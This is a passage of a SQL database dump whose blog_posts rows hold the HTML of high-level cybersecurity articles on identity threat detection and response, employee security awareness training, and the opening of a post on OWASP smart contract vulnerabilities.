combining IAM with Security Information and Event Management (SIEM) systems for a holistic security approach.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">What Are ITDR Systems?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Identity Threat Detection and Response (ITDR) systems are cybersecurity platforms that combine identity management and security monitoring to tackle credential-related risks. Unlike traditional preventive tools, ITDR delivers robust measures for threat detection and response. ITDR systems operate across three key phases:</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Collect</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Detect</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Respond</strong></b></li>\r\n</ol>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Collection Phase</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The foundation of ITDR systems begins with precise data collection. These systems gather valuable insights from various sources, including:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Identity Providers (IDPs):</strong></b> These platforms are responsible for user authentication processes and often enable Single Sign-On (SSO) capabilities. They provide key insights into user behavior, such as access patterns and failed authentication attempts.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Directories:</strong></b> Directories store vital information, such as usernames, hashed passwords, and user roles. Common examples include systems utilizing Lightweight Directory Access Protocol (LDAP) or Microsoft Active Directory.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Network Flow Data:</strong></b> Capturing network activity provides additional context to log files. Unlike logs that could be tempered with, network flow data ensures added visibility across organizational traffic.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Firewall and Security Logs:</strong></b> These logs track access attempts to sensitive resources, helping identify possible intrusions or unauthorized access attempts.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\"><b><strong class=\"font-bold\">SIEM Systems:</strong></b> Security Information and Event Management systems aggregate and analyze security data from multiple sources, providing comprehensive insights into security events.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By consolidating data from these sources, ITDR systems offer a centralized and holistic view of identity activity across an enterprise, enabling organizations to monitor patterns and detect anomalies effectively. These insights are often presented through customizable dashboards, providing actionable intelligence about risky behaviors and suspicious accounts.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Detection Phase</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">ITDR systems excel at detecting anomalies and identifying patterns that traditional tools might overlook. Unlike traditional SIEM tools that focus on events that <i><em class=\"italic\">did happen</em></i> (e.g., a login attempt), ITDR systems can recognize activities that <i><em class=\"italic\">should have happened</em></i> but didn’t. For example:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">A user logs in but skips the expected MFA step.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">An internal user accesses sensitive applications without proper authentication.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">ITDR systems employ advanced techniques, such as state diagrams, to map expected workflows and identify deviations. For instance:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Internal users should access general applications after appropriate authentication.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">External users should log in via a VPN (Virtual Private Network), complete MFA, and then access sensitive applications.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Deviations from these expected workflows raise red flags and trigger alerts for further investigation.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Response Phase</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">When ITDR systems detect a threat, they immediately initiate response actions to minimize damage and prevent escalation. Common response actions include:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Account Lockouts:</strong></b> Temporarily suspending accounts to prevent further unauthorized use.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Access Privilege Adjustments:</strong></b> Restricting privileges based on suspicious activity, following the principle of least privilege.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Incident Reporting:</strong></b> Logging incidents and notifying security teams with actionable insights and recommendations for resolution.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By integrating ITDR systems with broader SIEM platforms, organizations enable real-time communication between systems, enhancing the effectiveness of both detection and response.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">What Can ITDR Systems Detect?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Identity Threat Detection and Response systems identify complex and subtle threats that traditional tools often miss. For example:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Weak Authentication Loopholes:</strong></b> Spotting users bypassing MFA or using outdated authentication methods.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Risky Privileged Access:</strong></b> Detecting unauthorized attempts to access high-privilege accounts like admin or root accounts.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Anomalous Access Patterns:</strong></b> Identifying unusual user behavior, such as repeated access from external IPs or attempts to access applications unrelated to a user’s role.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Benefits of ITDR Systems</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Adding ITDR systems to a cybersecurity strategy offers significant advantages, including:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Enhanced Identity Protection:</strong></b> By monitoring user activity across multiple sources, ITDR systems minimize the risk of credential misuse and insider threats.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Improved Detection of Advanced Threats:</strong></b> ITDR addresses the gaps in traditional IAM tools by providing greater visibility into sophisticated attack strategies, such as lateral movement or advanced phishing attacks.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Efficient Incident Response:</strong></b> Automated responses enable organizations to react to threats swiftly, reducing the time taken to contain and neutralize breaches.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Considerations for Implementing ITDR</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">To maximize the benefits of ITDR, businesses should consider:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">System Compatibility:</strong></b> Ensure the ITDR platform integrates seamlessly with existing IAM, security, and IT infrastructure.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Employee Training:</strong></b> Equip IT teams with the knowledge to interpret ITDR outputs and respond effectively.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Ongoing Monitoring and Upgrades:</strong></b> Regularly update ITDR systems to stay ahead of evolving threats and maintain optimal performance.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Future of ITDR Systems</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">With attackers adopting increasingly sophisticated credential-based strategies, the future of ITDR will involve more advanced technologies like AI-powered threat analytics. These systems will predict potential vulnerabilities using historical data and automate responses with greater precision. ITDR solutions are expected to evolve beyond detection and response, offering predictive capabilities as part of their core functionality.</p>', '', NULL, NULL, 1, 'draft', '2025-01-23 19:22:24', '2026-01-12 21:41:44', 'Information Security', 'Unlocking Identity Threat Detection and Response in Cybersecurity', '', NULL),
(63, 'The Importance of Cybersecurity Awareness Training', 'the-importance-of-cybersecurity-awareness-training', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity threats are becoming more sophisticated, diverse, and frequent. With the rise of cybercrime—from phishing emails to ransomware attacks—organizations of all sizes must equip their teams with the knowledge and tools to combat these dangers. Cybersecurity awareness training has rapidly emerged as a critical line of defense against cyber threats, empowering employees to identify and mitigate potential risks.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">This blog explores why such training is essential, how it addresses current cybersecurity trends, and the steps IT professionals and businesses can take to implement effective programs.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Cybersecurity Trends and the Growing Need for Training</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The world of cybercrime evolves daily. Hackers exploit everything from outdated systems to human error to gain unauthorized access. Some critical trends driving the need for cybersecurity awareness training include:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Phishing Attacks</strong></b>: Cybercriminals are getting better at crafting believable phishing emails, targeting employees to reveal sensitive data.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Ransomware</strong></b>: Many businesses have fallen victim to ransomware, where hackers encrypt critical data and demand payment for its release.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Remote Work Risks</strong></b>: The shift to remote work, while convenient, opens more weak points in security systems. Employees using unsecured devices can expose organizations to attacks.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The rapidly changing nature of these threats highlights the importance of equipping employees with the awareness to recognize potential dangers and respond appropriately.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Identifying Cybersecurity Risks in Small Businesses</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Small businesses may believe they are too small to be targeted, but they are often seen as easy marks by cybercriminals. Common vulnerabilities for small companies include:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Lack of a dedicated IT team or security plan.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Employees with little to no cybersecurity training.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Outdated software and technology.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\"></p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Unfortunately, a single incident could lead to significant financial and reputational damage. Training employees to recognize risks—such as identifying suspicious emails or securing sensitive data—offers small businesses a fighting chance against cybercriminals.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Role of IT Professionals in Implementing Training</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">IT professionals play a crucial role in protecting organizations from cyber threats and in implementing cybersecurity awareness training. Their responsibilities include:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Assessing threats</strong></b> unique to the company’s industry and operating systems.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Designing training programs</strong></b> tailored to employees\' roles and technical expertise.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Educating employees</strong></b> on key security practices, such as creating strong passwords, identifying phishing attempts, and reporting irregularities.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By collaborating with leadership, IT professionals ensure that cybersecurity becomes an organizational priority.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Creating a Cybersecurity Training Plan</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Planning a comprehensive cybersecurity awareness program ensures consistency and effectiveness. Here’s how organizations can structure their training plans:</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Assess Current Knowledge</strong></b>: Begin by identifying gaps in employees’ cybersecurity knowledge through surveys or assessments.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Define Goals</strong></b>: Outline clear objectives for the training. What skills or practices should employees master?</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Integrate Real-life Scenarios</strong></b>: Use case studies or simulations to show employees how cyberattacks play out and what measures to take.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Update Regularly</strong></b>: Cybersecurity is always changing. Schedule regular reviews and updates to incorporate the latest risks and trends.</li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Making cybersecurity training engaging and accessible ensures employees retain and apply their knowledge.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Implementing Incident Response Strategies</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Even the best training cannot prevent every cyberattack. That’s why incident response strategies are an essential component of cybersecurity planning. A strong response plan ensures that businesses can take quick, effective action during a cyberattack to minimize damages.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Training employees in incident response includes:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Teaching clear protocols</strong></b> for reporting suspicious activity or breaches.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Training employees on their role—whether it’s isolating affected systems, securing critical data, or notifying leadership.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Running drills</strong></b> to mimic cyberattacks and test the organization’s readiness.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">With trained employees and a robust response plan, businesses can recover more effectively when faced with an attack.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Measuring the Effectiveness of Cybersecurity Training</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">How do you know if your cybersecurity training is working? Measuring its effectiveness is crucial for making ongoing improvements.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Employee Assessments</strong></b>: Regular knowledge checks or post-training quizzes can reveal whether employees are internalizing key concepts.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Incident Reports</strong></b>: Fewer security incidents involving human error (e.g., clicking on phishing emails) indicate improved awareness.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Simulations</strong></b>: Set up phishing or breach simulations to evaluate employees’ ability to detect threats.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Feedback and Surveys</strong></b>: Collect feedback from employees to understand which areas of training were most helpful or require clarification.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Continuous monitoring ensures that training programs remain impactful and relevant.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Future of Cybersecurity and the Importance of Ongoing Training</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The future of cybersecurity promises more advanced technologies—and, with them, more complex threats. AI-driven malware, quantum computing, and the Internet of Things (IoT) will add new layers of security risks for organizations of all sizes.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">To stay ahead, organizations must view cybersecurity awareness training as an ongoing process rather than a one-time event. Regular updates, tailored strategies, and leadership commitment are critical to maintaining a security-conscious workforce.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Empowering a Secure Digital Future</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity awareness training is not just a checkbox; it’s a necessity for every modern organization. Empower your employees, strengthen your incident response strategies, and create a culture where security comes first.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Whether you’re an IT professional designing your first training plan or a small business owner ready to secure your operations, investing in employee education is a step toward a safer, more resilient future.</p>', '', NULL, NULL, 1, 'draft', '2025-01-23 15:22:57', '2026-01-12 21:41:44', 'Information Security', 'The Importance of Cybersecurity Awareness Training', '', NULL);
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(64, 'OWASP Top 10 Smart Contract Vulnerabilities for 2025', 'owasp-top-10-smart-contract-vulnerabilities-for-2025', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Smart contracts lie at the heart of blockchain innovation, enabling decentralized applications (dApps) and seamless transactions. However, they also introduce unique security challenges. To address these, the OWASP Top 10 for 2025 identifies the most critical vulnerabilities developers, auditors, and security professionals must consider to maintain secure and robust blockchain ecosystems.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By fortifying smart contracts against these vulnerabilities, developers can minimize risks, protecting both assets and the trust users place in decentralized technologies.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. <b><strong class=\"font-bold\">Access Control Vulnerabilities</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Access control issues occur when smart contracts fail to enforce proper permissions, allowing unauthorized users to access or modify sensitive data or functions. This can lead to severe breaches, such as stolen assets or critical system alterations.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong 